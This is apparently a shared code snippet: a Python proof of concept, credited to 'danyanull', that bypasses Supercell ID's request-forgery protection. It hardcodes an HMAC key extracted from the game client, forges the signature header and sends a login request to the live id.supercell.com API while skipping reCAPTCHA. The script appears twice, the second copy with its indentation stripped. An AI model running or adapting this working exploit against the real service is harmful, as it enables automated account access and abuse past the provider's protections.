technorav3nn · February 6, 2025 16:13
diff --git a/scid_poc.py b/scid_poc.py
 import hmac
 import base64
 import urllib.parse
 import requests
 import time

 # Supercell ID "Request Forgery Protection" bypass by danyanull, 2025
 # I know this code is holy crap but it's made as a PoC just for fun in about 2 hours

 def sign(timestamp: int, path: str, method: str, body: str, headers: dict[str, str]):
  # The key is subject to change, but can be easily found in game client anyway
 	key = bytes.fromhex("ae584daf58a3757be21fb506dfcfc478fad4600e688d5bb6f3e51ccb2ebfc373")

 	headers_str = ""
 	headers_value_str = ""
 	for header in ("Authorization", "User-Agent", "X-Supercell-Device-Id"):
 		if header in headers:
 			header_lower = header.lower()
 			if len(headers_str) > 0:
 				headers_str += ";"
 			headers_str += header_lower
 			headers_value_str += header_lower + "=" + headers[header]

 	to_sign = f"{timestamp}{method}{path}{body}{headers_value_str}"
 	x = hmac.digest(key, to_sign.encode("utf-8"), "sha256")
 	xb = base64.b64encode(x).decode("utf-8").replace("+", "-").replace("/", "_").replace("=", "")
 	return f"RFPv1 Timestamp={timestamp},SignedHeaders={headers_str},Signature={xb}"

 ts = int(time.time())
 host = "https://id.supercell.com"
 path = "/api/ingame/account/login"
 body = urllib.parse.urlencode({
 	"lang": "en",
 	"email": "<EMAIL HERE>", # Change this!
 	"remember": "true",
 	"game": "laser",
 	"env": "prod",
 	"unified_flow": "LOGIN",
 	"recaptchaToken": "FAILED_EXECUTION", # And this!
 	"recaptchaSiteKey": "6Lf3ThsqAAAAABuxaWIkogybKxfxoKxtR-aq5g7l"
 })
 headers = {
 	"User-Agent": "scid/1.5.8-f (iPadOS 18.1; laser-prod; iPad8,6) com.supercell.laser/59.197",
 	"Accept-Language": "en",
 	"Accept-Encoding": "gzip",
 	"X-Supercell-Device-Id": "1E923809-1680-535C-80F0-EFEFEFEFEF38", # And this too (maybe)
 	"Content-Type": "application/x-www-form-urlencoded; charset=utf-8",
 	"Content-Length": str(len(body)),
 	"Accept": None,
 	"Connection": None
 }

 headers["X-Supercell-Request-Forgery-Protection"] = sign(ts, path, "POST", body, headers)

 result = requests.post(f"{host}{path}", headers={k.lower(): v for k, v in headers.items()}, data=body)

 print(result.status_code, result.json())
	import hmac
	import base64
	import urllib.parse
	import requests
	import time

	# Supercell ID "Request Forgery Protection" bypass by danyanull, 2025
	# I know this code is holy crap but it's made as a PoC just for fun in about 2 hours

	def sign(timestamp: int, path: str, method: str, body: str, headers: dict[str, str]):
	# The key is subject to change, but can be easily found in game client anyway
	key = bytes.fromhex("ae584daf58a3757be21fb506dfcfc478fad4600e688d5bb6f3e51ccb2ebfc373")

	headers_str = ""
	headers_value_str = ""
	for header in ("Authorization", "User-Agent", "X-Supercell-Device-Id"):
	if header in headers:
	header_lower = header.lower()
	if len(headers_str) > 0:
	headers_str += ";"
	headers_str += header_lower
	headers_value_str += header_lower + "=" + headers[header]

	to_sign = f"{timestamp}{method}{path}{body}{headers_value_str}"
	x = hmac.digest(key, to_sign.encode("utf-8"), "sha256")
	xb = base64.b64encode(x).decode("utf-8").replace("+", "-").replace("/", "_").replace("=", "")
	return f"RFPv1 Timestamp={timestamp},SignedHeaders={headers_str},Signature={xb}"

	ts = int(time.time())
	host = "https://id.supercell.com"
	path = "/api/ingame/account/login"
	body = urllib.parse.urlencode({
	"lang": "en",
	"email": "<EMAIL HERE>", # Change this!
	"remember": "true",
	"game": "laser",
	"env": "prod",
	"unified_flow": "LOGIN",
	"recaptchaToken": "FAILED_EXECUTION", # And this!
	"recaptchaSiteKey": "6Lf3ThsqAAAAABuxaWIkogybKxfxoKxtR-aq5g7l"
	})
	headers = {
	"User-Agent": "scid/1.5.8-f (iPadOS 18.1; laser-prod; iPad8,6) com.supercell.laser/59.197",
	"Accept-Language": "en",
	"Accept-Encoding": "gzip",
	"X-Supercell-Device-Id": "1E923809-1680-535C-80F0-EFEFEFEFEF38", # And this too (maybe)
	"Content-Type": "application/x-www-form-urlencoded; charset=utf-8",
	"Content-Length": str(len(body)),
	"Accept": None,
	"Connection": None
	}

	headers["X-Supercell-Request-Forgery-Protection"] = sign(ts, path, "POST", body, headers)

	result = requests.post(f"{host}{path}", headers={k.lower(): v for k, v in headers.items()}, data=body)

	print(result.status_code, result.json())
No results found